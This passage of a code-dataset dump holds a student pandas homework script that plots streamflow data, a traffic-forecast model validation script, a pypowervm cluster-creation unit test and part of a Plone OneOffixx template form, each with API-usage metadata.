"matplotlib.ticker.ScalarFormatter", "line_number": 28, "usage_type": "call"}, {"api_name": "matplotlib.ticker", "line_number": 28, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 30, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 30, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 32, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 32, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 33, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 33, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 34, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 34, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 35, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 35, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 41, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 41, 
"usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 42, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 42, "usage_type": "name"}]}
+{"seq_id": "8280225", "text": "# Example solution for HW 4\n\n# %%\n# Import the modules we will use\nimport os\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\n# %%\n# ** MODIFY **\n# Set the file name and path to where you have stored the data\nfilename = 'streamflow_week5.txt'\nfilepath = os.path.join('data', filename)\nprint(os.getcwd())\nprint(filepath)\n\n# filepath = '../Assignments/Solutions/data/streamflow_week1.txt'\n\n# %%\n#Read the data into a pandas dataframe\ndata=pd.read_table(filepath, sep = '\\t', skiprows=30,\n names=['agency_cd', 'site_no', 'datetime', 'flow', 'code']\n )\n\n# Expand the dates to year month day\ndata[[\"year\", \"month\", \"day\"]] =data[\"datetime\"].str.split(\"-\", expand=True)\ndata['year'] = data['year'].astype(int)\ndata['month'] = data['month'].astype(int)\ndata['day'] = data['day'].astype(int)\n\n# %%\n# Sorry no more helpers past here this week, you are on your own now :) \n# Hints - you will need the functions: describe, info, groupby, sort, head and tail.\n#%%\n# Esimation5\ndata.flow\n# print(data.datetime[(data.flow >= rnge[0]) & (data.flow <= rnge[1])])\n\n# list_2010 = []\n# list_2011 = []\n# list_2012 = []\n# list_2013 = []\n# list_2014 = []\n# list_2015 = []\n# list_2016 = []\n# list_2017 = []\n# list_2016 = []\n# list_2017 = []\n# list_2020 = []\n\n# data.flow[(data.year >= 2010) & (data.year <= 2020) & (data.month == i)].mean]\n#%%\n# 1, 3, 5, 7, 8, 10, 12\nfor d in range(2010, 2020):\n fig1 = plt.figure()\n fig1.patch.set_facecolor('xkcd:mint green')\n plt.title('%d'%(d))\n plt.ylabel('flow')\n for i in (1, 3, 5, 7, 8, 10, 12):\n # print(i)\n # print(data.flow[(data.year == 2010) & (data.month == i)].mean)\n # print(\"\\n\")\n # data.flow[(data.year == 2010) & (data.month == i)]\n x = list(range(1, 32))\n plt.plot(x, (data.flow[(data.year == d) & (data.month == i)]))\n plt.xlabel('days in month')\n plt.legend(['1', '3', '5', '7', '8', '10', '12'])\n plt.savefig('graphs/flow-set1_%d'%(d))\n\n \n# x = list(range(1, 32))\n# print(x)\n\n\n# print(flow_data.size)\n# print(flow_data.shape)\n# flow_202009 = flow_data[11571:11585, 3]\n# print(flow_202009)\n\n# x = [6.,7,8,9,10,11,12,13,14,15,16,17,18,19]\n# fig9 = plt.figure()\n# fig9.patch.set_facecolor('xkcd:mint green')\n# plt.plot(x, flow_202009)\n# plt.xlabel('days in September 2020')\n# plt.ylabel('flow')\n# plt.legend()\n# plt.savefig('graphs/flow_202009')\n\n# %%\n# 4, 6, 9, 11\nfor d in range(2010, 2020):\n fig2 = plt.figure()\n fig2.patch.set_facecolor('xkcd:mint green')\n plt.title('%d'%(d))\n plt.ylabel('flow')\n for i in (4, 6, 9, 11):\n # print(i)\n # print(data.flow[(data.year == 2010) & (data.month == i)].mean)\n # print(\"\\n\")\n # data.flow[(data.year == 2010) & (data.month == i)]\n x = list(range(1, 31))\n # print(x)\n plt.plot(x, (data.flow[(data.year == d) & (data.month == i)]))\n plt.xlabel('days in the month')\n plt.legend(['4', '6', '9', '11'])\n plt.savefig('graphs/flow-set2_%d'%(d))\n# %%\n# 2020\n\nfig3 = plt.figure()\nfig3.patch.set_facecolor('xkcd:mint green')\nplt.title('2020')\nplt.ylabel('flow')\nfor i in (1, 3, 5, 7, 8):\n # print(i)\n # print(data.flow[(data.year == 2010) & (data.month == i)].mean)\n # print(\"\\n\")\n # data.flow[(data.year == 2010) & (data.month == i)]\n x = list(range(1, 32))\n # print(x)\n plt.plot(x, (data.flow[(data.year == 2020) & (data.month == i)]))\n plt.xlabel('days in the month')\n plt.legend(['1', '3', '5', '7', '8'])\n plt.savefig('graphs/flow-set3_2020-%i'%(i))\n\ndata.flow[(data.year == 2020) & 
(data.month == 1)]\n\nfig4 = plt.figure()\nfig4.patch.set_facecolor('xkcd:mint green')\nplt.title('2020')\nplt.ylabel('flow')\nfor i in (4, 6):\n # print(i)\n # print(data.flow[(data.year == 2010) & (data.month == i)].mean)\n # print(\"\\n\")\n # data.flow[(data.year == 2010) & (data.month == i)]\n x = list(range(1, 31))\n # print(x)\n plt.plot(x, (data.flow[(data.year == 2020) & (data.month == i)]))\n plt.xlabel('days in the month')\n plt.legend(['4', '6'])\n plt.savefig('graphs/flow-set4_2020-%i'%(i))\n# %%\n# When September Ends\nx = list(range(1, 27))\nfig5 = plt.figure()\nfig5.patch.set_facecolor('xkcd:mint green')\nplt.title('2020-9')\nplt.ylabel('flow')\nplt.plot(x, (data.flow[(data.year == 2020) & (data.month == 9)]))\nplt.xlabel('days in the month')\nplt.legend([])\nplt.savefig('graphs/flow-set5_2020-9')\n\nprint((data.flow[(data.year == 2020) & (data.month == 9)]))\n# %%\n", "sub_path": "assignment_5/week5_pandas_starter_BM.py", "file_name": "week5_pandas_starter_BM.py", "file_ext": "py", "file_size_in_byte": 4760, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "os.path.join", "line_number": 14, "usage_type": "call"}, {"api_name": "os.path", "line_number": 14, "usage_type": "attribute"}, {"api_name": "os.getcwd", "line_number": 15, "usage_type": "call"}, {"api_name": "pandas.read_table", "line_number": 22, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 56, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 56, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 58, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 58, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 59, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 59, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 66, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 66, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 67, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 67, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 68, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 68, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 69, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 69, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 93, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 93, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 95, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 95, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 96, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 96, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 104, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 104, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 105, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 105, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 106, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 106, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", 
"line_number": 107, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 107, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 111, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 111, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 113, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 113, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 114, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 114, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 122, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 122, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 123, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 123, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 124, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 124, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 125, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 125, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 129, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 129, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 131, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 131, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 132, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 132, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 140, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 140, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 141, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 141, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 142, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 142, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 143, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 143, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 147, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 147, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 149, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 149, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 150, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 150, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 151, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 151, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 152, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 152, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 153, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 153, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 154, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 154, "usage_type": "name"}]}
+{"seq_id": "499603482", "text": "import os\nimport sys\nimport torch\nfrom collections import defaultdict\nimport json\nimport pickle\nimport logging\nlogging.basicConfig()\n\nsys.path.append(os.getcwd())\nfrom generalization_config import config\nfrom utils.graph_utils import create_adj_matrix, blockify_A, create_coordinate_channel, \\\n create_edge_index_from_adjacency_matrix\nfrom utils.training_gcn_utils import validate\nfrom utils.training_unet_utils import validate as validate_unet\nfrom utils.videoloader import trafic4cast_dataset\n\n\nfrom models.unet import UNet\nfrom models.graph_models import KipfNet_orig, KipfNet, KipfNetd2, Graph_resnet\n\n\n\ndef get_graphdata_obj(inputs, edge_index, y, num_features=38, num_classes=9):\n graphdata = Data(x=inputs, edge_index=edge_index, y=y)\n\n return graphdata\n\n\ndef get_n_params(model):\n pp = 0\n for p in list(model.parameters()):\n nn = 1\n for s in list(p.size()):\n nn = nn * s\n pp += nn\n return pp\n\n\nif __name__ == \"__main__\":\n print('batch_size: ', config['dataloader']['batch_size'])\n print(config['device_num'])\n device = torch.device(config['device_num'])\n\n model_tuple_list = config['model_tuple_list']\n\n resultdict = defaultdict(dict)\n\n for city in ['Berlin', 'Moscow', 'Istanbul']:\n config['dataset']['cities'] = [city]\n\n dataset_val = trafic4cast_dataset(split_type='validation', **config['dataset'],\n reduce=True, filter_test_times=True)\n\n val_loader = torch.utils.data.DataLoader(dataset_val, shuffle=False,\n **config['dataloader'])\n\n for model_tuple in model_tuple_list:\n model_plot_name = model_tuple[0]\n model_path = model_tuple[1]\n is_graph = model_tuple[2]\n graph_model_name = model_tuple[3]\n\n with open(os.path.join(model_path, 'config.json'), 'r') as f:\n model_config = json.load(f)\n\n adj, nn_ixs, G, mask = create_adj_matrix(city=config['dataset']['cities'][0],\n mask_threshold=config['mask_threshold'])\n\n if not is_graph:\n model_config['model']['batch_norm'] = True\n model = UNet(**model_config['model']).to(device)\n model.load_state_dict(torch.load(os.path.join(model_path, 'checkpoint.pt'),\n map_location=device))\n\n mask = torch.from_numpy(mask).to(device)\n\n if 'MIE-Lab' in model_plot_name:\n norm = False\n else:\n norm = True\n\n val_loss = validate_unet(model=model, val_loader=val_loader, device=device, mask=mask,\n config=model_config, print_loss=False, norm=norm)\n\n if is_graph:\n\n n_features = 38\n batch_size = config['dataloader']['batch_size']\n assert batch_size == 1, \"batch_size should be 1 for graphs\"\n\n coords = create_coordinate_channel(b=batch_size)\n\n if config['dataloader']['batch_size'] > 1:\n adj = blockify_A(adj, config['dataloader']['batch_size'])\n\n edge_index = create_edge_index_from_adjacency_matrix(adj)\n edge_index = edge_index.to(device)\n\n if graph_model_name == 'kipfnet':\n model = KipfNet_orig(num_features=n_features,\n num_classes=9, **model_config['model']['KIPF']).to(device)\n model.load_state_dict(torch.load(os.path.join(model_path, 'checkpoint.pt'),\n map_location=device))\n\n elif graph_model_name == 'skipfnet':\n model = KipfNet(num_features=n_features,\n num_classes=9, **model_config['model']['KipfNet']).to(device)\n model.load_state_dict(torch.load(os.path.join(model_path, 'checkpoint.pt'),\n map_location=device))\n\n elif graph_model_name == 'skipfnet2d':\n model = KipfNetd2(num_features=n_features,\n num_classes=9, **model_config['model']['KipfNetd2']).to(device)\n model.load_state_dict(torch.load(os.path.join(model_path, 'checkpoint.pt'),\n 
map_location=device))\n\n elif graph_model_name == 'Graph_resnet':\n model = Graph_resnet(num_features=n_features,\n num_classes=9, **model_config['model']['Graph_resnet']).to(device)\n model.load_state_dict(torch.load(os.path.join(model_path, 'checkpoint.pt'),\n map_location=device))\n\n mask = None\n val_loss = validate(model=model, val_loader=val_loader, device=device,\n adj=adj, nn_ixs=nn_ixs, edge_index=edge_index, coords=coords,\n mask=mask, batch_size=batch_size, print_loss=False)\n\n print(\"Validation loss {}: {} = {:.2f}\".format(city, model_plot_name, val_loss))\n resultdict[model_plot_name][city] = val_loss\n\n nb_params = get_n_params(model)\n resultdict[model_plot_name]['nb_params'] = nb_params\n\n pickle.dump(resultdict, open(os.path.join('.', 'output', 'data_generalization.p'), 'wb'))\n", "sub_path": "experiment/generalization.py", "file_name": "generalization.py", "file_ext": "py", "file_size_in_byte": 5807, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "logging.basicConfig", "line_number": 8, "usage_type": "call"}, {"api_name": "sys.path.append", "line_number": 10, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 10, "usage_type": "attribute"}, {"api_name": "os.getcwd", "line_number": 10, "usage_type": "call"}, {"api_name": "generalization_config.config", "line_number": 41, "usage_type": "name"}, {"api_name": "generalization_config.config", "line_number": 42, "usage_type": "name"}, {"api_name": "torch.device", "line_number": 43, "usage_type": "call"}, {"api_name": "generalization_config.config", "line_number": 43, "usage_type": "name"}, {"api_name": "generalization_config.config", "line_number": 45, "usage_type": "name"}, {"api_name": "collections.defaultdict", "line_number": 47, "usage_type": "call"}, {"api_name": "generalization_config.config", "line_number": 50, "usage_type": "name"}, {"api_name": "utils.videoloader.trafic4cast_dataset", "line_number": 52, "usage_type": "call"}, {"api_name": "generalization_config.config", "line_number": 52, "usage_type": "name"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 55, "usage_type": "call"}, {"api_name": "torch.utils", "line_number": 55, "usage_type": "attribute"}, {"api_name": "generalization_config.config", "line_number": 56, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 64, "usage_type": "call"}, {"api_name": "os.path", "line_number": 64, "usage_type": "attribute"}, {"api_name": "json.load", "line_number": 65, "usage_type": "call"}, {"api_name": "utils.graph_utils.create_adj_matrix", "line_number": 67, "usage_type": "call"}, {"api_name": "generalization_config.config", "line_number": 67, "usage_type": "name"}, {"api_name": "generalization_config.config", "line_number": 68, "usage_type": "name"}, {"api_name": "models.unet.UNet", "line_number": 72, "usage_type": "call"}, {"api_name": "torch.load", "line_number": 73, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 73, "usage_type": "call"}, {"api_name": "os.path", "line_number": 73, "usage_type": "attribute"}, {"api_name": "torch.from_numpy", "line_number": 76, "usage_type": "call"}, {"api_name": "utils.training_unet_utils.validate", "line_number": 83, "usage_type": "call"}, {"api_name": "generalization_config.config", "line_number": 89, "usage_type": "name"}, {"api_name": "utils.graph_utils.create_coordinate_channel", "line_number": 92, "usage_type": "call"}, {"api_name": "generalization_config.config", "line_number": 94, 
"usage_type": "name"}, {"api_name": "utils.graph_utils.blockify_A", "line_number": 95, "usage_type": "call"}, {"api_name": "generalization_config.config", "line_number": 95, "usage_type": "name"}, {"api_name": "utils.graph_utils.create_edge_index_from_adjacency_matrix", "line_number": 97, "usage_type": "call"}, {"api_name": "models.graph_models.KipfNet_orig", "line_number": 101, "usage_type": "call"}, {"api_name": "torch.load", "line_number": 103, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 103, "usage_type": "call"}, {"api_name": "os.path", "line_number": 103, "usage_type": "attribute"}, {"api_name": "models.graph_models.KipfNet", "line_number": 107, "usage_type": "call"}, {"api_name": "torch.load", "line_number": 109, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 109, "usage_type": "call"}, {"api_name": "os.path", "line_number": 109, "usage_type": "attribute"}, {"api_name": "models.graph_models.KipfNetd2", "line_number": 113, "usage_type": "call"}, {"api_name": "torch.load", "line_number": 115, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 115, "usage_type": "call"}, {"api_name": "os.path", "line_number": 115, "usage_type": "attribute"}, {"api_name": "models.graph_models.Graph_resnet", "line_number": 119, "usage_type": "call"}, {"api_name": "torch.load", "line_number": 121, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 121, "usage_type": "call"}, {"api_name": "os.path", "line_number": 121, "usage_type": "attribute"}, {"api_name": "utils.training_gcn_utils.validate", "line_number": 125, "usage_type": "call"}, {"api_name": "pickle.dump", "line_number": 135, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 135, "usage_type": "call"}, {"api_name": "os.path", "line_number": 135, "usage_type": "attribute"}]}
+{"seq_id": "252197386", "text": "# Copyright 2015 IBM Corp.\n#\n# All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nimport unittest\n\nimport mock\n\nimport pypowervm.entities as ent\nimport pypowervm.tasks.cluster_ssp as cs\nimport pypowervm.tests.tasks.util as tju\nimport pypowervm.util as u\nimport pypowervm.wrappers.cluster as clust\nimport pypowervm.wrappers.job as jwrap\nimport pypowervm.wrappers.storage as stor\n\nCREATE_CLUSTER = 'cluster_create_job_template.txt'\n\n\nclass TestClusterSSP(unittest.TestCase):\n\n @mock.patch('pypowervm.wrappers.job.Job.delete_job')\n @mock.patch('pypowervm.wrappers.job.Job._monitor_job')\n @mock.patch('pypowervm.wrappers.job.Job.job_status')\n @mock.patch('pypowervm.adapter.Adapter')\n def test_crt_cluster_ssp(self, mock_adp, mock_status, mock_monitor_job,\n mock_del_job):\n # Load up GET Cluster/do/Create (job template)\n mock_adp.read.return_value = tju.load_file(CREATE_CLUSTER, mock_adp)\n # We'll pretend the job ran and completed successfully\n mock_monitor_job.return_value = False\n mock_status.__get__ = mock.Mock(\n return_value=jwrap.JobStatus.COMPLETED_OK)\n\n # Mock Job.create_job to check job parameter values\n def create_job(job_el, entry_type, *args, **kwargs):\n self.assertEqual(entry_type, clust.Cluster.schema_type)\n job = jwrap.Job.wrap(ent.Entry({}, job_el, None))\n param_vals = job._get_vals(u.xpath(\n 'JobParameters', 'JobParameter', 'ParameterValue'))\n self.assertEqual(\n param_vals[0],\n 'clust_namerepos_pv_namevios15XXXXYYYZZZZZZZ')\n self.assertEqual(\n param_vals[1],\n '<'\n 'uom:Metadata>hdisk1'\n 'hdisk2hdisk3ssp'\n '_name')\n return mock.MagicMock()\n mock_adp.create_job.side_effect = create_job\n node = clust.Node.bld(\n mock_adp, hostname='vios1', lpar_id=5, mtms='XXXX-YYY*ZZZZZZZ',\n vios_uri='https://a.example.com:12443/rest/api/uom/VirtualIOServe'\n 'r/12345678-1234-1234-1234-123456789012')\n repos = stor.PV.bld(mock_adp, name='repos_pv_name')\n data = [stor.PV.bld(mock_adp, name=n) for n in (\n 'hdisk1', 'hdisk2', 'hdisk3')]\n cs.crt_cluster_ssp('clust_name', 'ssp_name', repos, node, data)\n # run_job() should run delete_job() at the end\n self.assertEqual(mock_del_job.call_count, 1)\n", "sub_path": "pypowervm/tests/tasks/test_cluster_ssp.py", "file_name": "test_cluster_ssp.py", "file_ext": "py", "file_size_in_byte": 5123, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "unittest.TestCase", "line_number": 32, "usage_type": "attribute"}, {"api_name": "pypowervm.tests.tasks.util.load_file", "line_number": 41, "usage_type": "call"}, {"api_name": "pypowervm.tests.tasks.util", "line_number": 41, "usage_type": "name"}, {"api_name": "mock.Mock", "line_number": 44, "usage_type": "call"}, {"api_name": "pypowervm.wrappers.job.JobStatus", "line_number": 45, "usage_type": "attribute"}, {"api_name": "pypowervm.wrappers.job", "line_number": 45, "usage_type": "name"}, {"api_name": "pypowervm.wrappers.cluster.Cluster", "line_number": 
49, "usage_type": "attribute"}, {"api_name": "pypowervm.wrappers.cluster", "line_number": 49, "usage_type": "name"}, {"api_name": "pypowervm.wrappers.job.Job.wrap", "line_number": 50, "usage_type": "call"}, {"api_name": "pypowervm.wrappers.job.Job", "line_number": 50, "usage_type": "attribute"}, {"api_name": "pypowervm.wrappers.job", "line_number": 50, "usage_type": "name"}, {"api_name": "pypowervm.entities.Entry", "line_number": 50, "usage_type": "call"}, {"api_name": "pypowervm.entities", "line_number": 50, "usage_type": "name"}, {"api_name": "pypowervm.util.xpath", "line_number": 51, "usage_type": "call"}, {"api_name": "pypowervm.util", "line_number": 51, "usage_type": "name"}, {"api_name": "mock.MagicMock", "line_number": 86, "usage_type": "call"}, {"api_name": "pypowervm.wrappers.cluster.Node.bld", "line_number": 88, "usage_type": "call"}, {"api_name": "pypowervm.wrappers.cluster.Node", "line_number": 88, "usage_type": "attribute"}, {"api_name": "pypowervm.wrappers.cluster", "line_number": 88, "usage_type": "name"}, {"api_name": "pypowervm.wrappers.storage.PV.bld", "line_number": 92, "usage_type": "call"}, {"api_name": "pypowervm.wrappers.storage.PV", "line_number": 92, "usage_type": "attribute"}, {"api_name": "pypowervm.wrappers.storage", "line_number": 92, "usage_type": "name"}, {"api_name": "pypowervm.wrappers.storage.PV.bld", "line_number": 93, "usage_type": "call"}, {"api_name": "pypowervm.wrappers.storage.PV", "line_number": 93, "usage_type": "attribute"}, {"api_name": "pypowervm.wrappers.storage", "line_number": 93, "usage_type": "name"}, {"api_name": "pypowervm.tasks.cluster_ssp.crt_cluster_ssp", "line_number": 95, "usage_type": "call"}, {"api_name": "pypowervm.tasks.cluster_ssp", "line_number": 95, "usage_type": "name"}, {"api_name": "mock.patch", "line_number": 34, "usage_type": "call"}, {"api_name": "mock.patch", "line_number": 35, "usage_type": "call"}, {"api_name": "mock.patch", "line_number": 36, "usage_type": "call"}, {"api_name": "mock.patch", "line_number": 37, "usage_type": "call"}]}
+{"seq_id": "111741236", "text": "from copy import deepcopy\nfrom opengever.base.schema import TableChoice\nfrom opengever.oneoffixx import _\nfrom opengever.oneoffixx.api_client import OneoffixxAPIClient\nfrom opengever.oneoffixx.command import CreateDocumentFromOneOffixxTemplateCommand\nfrom opengever.oneoffixx.utils import whitelisted_template_types\nfrom plone.i18n.normalizer.interfaces import IFileNameNormalizer\nfrom plone.supermodel import model\nfrom plone.z3cform.layout import FormWrapper\nfrom z3c.form import button\nfrom z3c.form.field import Fields\nfrom z3c.form.form import Form\nfrom zope import schema\nfrom zope.component import getUtility\nfrom zope.i18n import translate\nfrom zope.interface import provider\nfrom zope.schema.interfaces import IContextSourceBinder\nfrom zope.schema.vocabulary import SimpleVocabulary\n\n\ndef get_oneoffixx_favorites():\n \"\"\"Return the user chosen favorites as a template group, if any.\"\"\"\n api_client = OneoffixxAPIClient()\n favorites = api_client.get_oneoffixx_favorites()\n if favorites.get('templates'):\n return favorites\n return None\n\n\ndef get_oneoffixx_template_groups():\n \"\"\"Return the template groups.\n\n Potentially amended with user chosen favorites.\n \"\"\"\n api_client = OneoffixxAPIClient()\n # We need to work on a copy to not pollute the cached one\n template_groups = deepcopy(api_client.get_oneoffixx_template_groups())\n favorites = get_oneoffixx_favorites()\n if favorites:\n template_groups.insert(0, favorites)\n return template_groups\n\n\ndef get_oneoffixx_templates():\n \"\"\"Return all oneoffixx templates.\n\n We do not want duplicates from favorites here.\n \"\"\"\n api_client = OneoffixxAPIClient()\n return (\n OneOffixxTemplate(template, template_group.get('localizedName', ''))\n for template_group in api_client.get_oneoffixx_template_groups()\n for template in template_group.get(\"templates\")\n if template.get('metaTemplateId') in whitelisted_template_types\n )\n\n\ndef default_template_group():\n \"\"\"Return all templates, or the user favorites, if defined by user.\"\"\"\n favorites = get_oneoffixx_favorites()\n if favorites:\n return favorites.get('id')\n return None\n\n\n@provider(IContextSourceBinder)\ndef list_templates(context):\n \"\"\"Return a list available templates.\"\"\"\n templates = get_oneoffixx_templates()\n template_group = context.REQUEST.form.get('form.widgets.template_group')\n terms = []\n\n for template in templates:\n terms.append(SimpleVocabulary.createTerm(\n template, template.template_id, template.title))\n\n # We filter templates when template_group has been selected\n if template_group is not None:\n favorites = get_oneoffixx_favorites()\n # Favorites are a special case\n if favorites and template_group[0] == favorites.get('id'):\n terms = [\n SimpleVocabulary.createTerm(\n OneOffixxTemplate(\n template, favorites.get('localizedName', '')),\n template.get('id'),\n template.get('localizedName'),\n )\n for template in favorites.get('templates')\n ]\n elif template_group[0] != '--NOVALUE--':\n terms = [term for term in terms if term.value.group == template_group[0]]\n\n return MutableObjectVocabulary(terms)\n\n\n@provider(IContextSourceBinder)\ndef list_template_groups(context):\n \"\"\"Return the list of available template groups.\"\"\"\n template_groups = get_oneoffixx_template_groups()\n terms = []\n for group in template_groups:\n terms.append(SimpleVocabulary.createTerm(group.get(\"id\"),\n group.get(\"id\"),\n group.get(\"localizedName\")))\n return 
MutableObjectVocabulary(terms)\n\n\nclass OneOffixxTemplate(object):\n\n def __init__(self, template, groupname):\n self.title = template.get(\"localizedName\")\n self.template_id = template.get(\"id\")\n self.group = template.get('templateGroupId')\n self.groupname = groupname\n template_type = template['metaTemplateId']\n template_type_info = whitelisted_template_types[template_type]\n self.content_type = template_type_info['content-type']\n filename = template.get(\"localizedName\")\n normalizer = getUtility(IFileNameNormalizer, name='gever_filename_normalizer')\n self.filename = normalizer.normalize(filename, extension=template_type_info['extension'])\n self.languages = template.get(\"languages\")\n\n def __eq__(self, other):\n if type(other) == type(self):\n return self.template_id == other.template_id\n return False\n\n\nclass MutableObjectVocabulary(SimpleVocabulary):\n\n def __contains__(self, value):\n try:\n return any([value == val for val in self.by_value])\n except TypeError:\n return False\n\n\nclass ICreateDocumentFromOneOffixxTemplate(model.Schema):\n\n # XXX - this always renders the --NOVALUE-- as the actually chosen\n # default is actually loaded over AJAX - confusing and bad UX\n template_group = schema.Choice(\n title=_(u'label_template_group', default=u'Template group'),\n source=list_template_groups,\n required=False,\n defaultFactory=default_template_group,\n )\n\n template = TableChoice(\n title=_(u\"label_template\", default=u\"Template\"),\n source=list_templates,\n required=True,\n show_filter=True,\n vocabulary_depends_on=['form.widgets.template_group'],\n columns=(\n {'column': 'title',\n 'column_title': _(u'label_title', default=u'Title'),\n 'sort_index': 'sortable_title'},\n )\n )\n\n title = schema.TextLine(\n title=_(u\"label_title\", default=u\"Title\"),\n 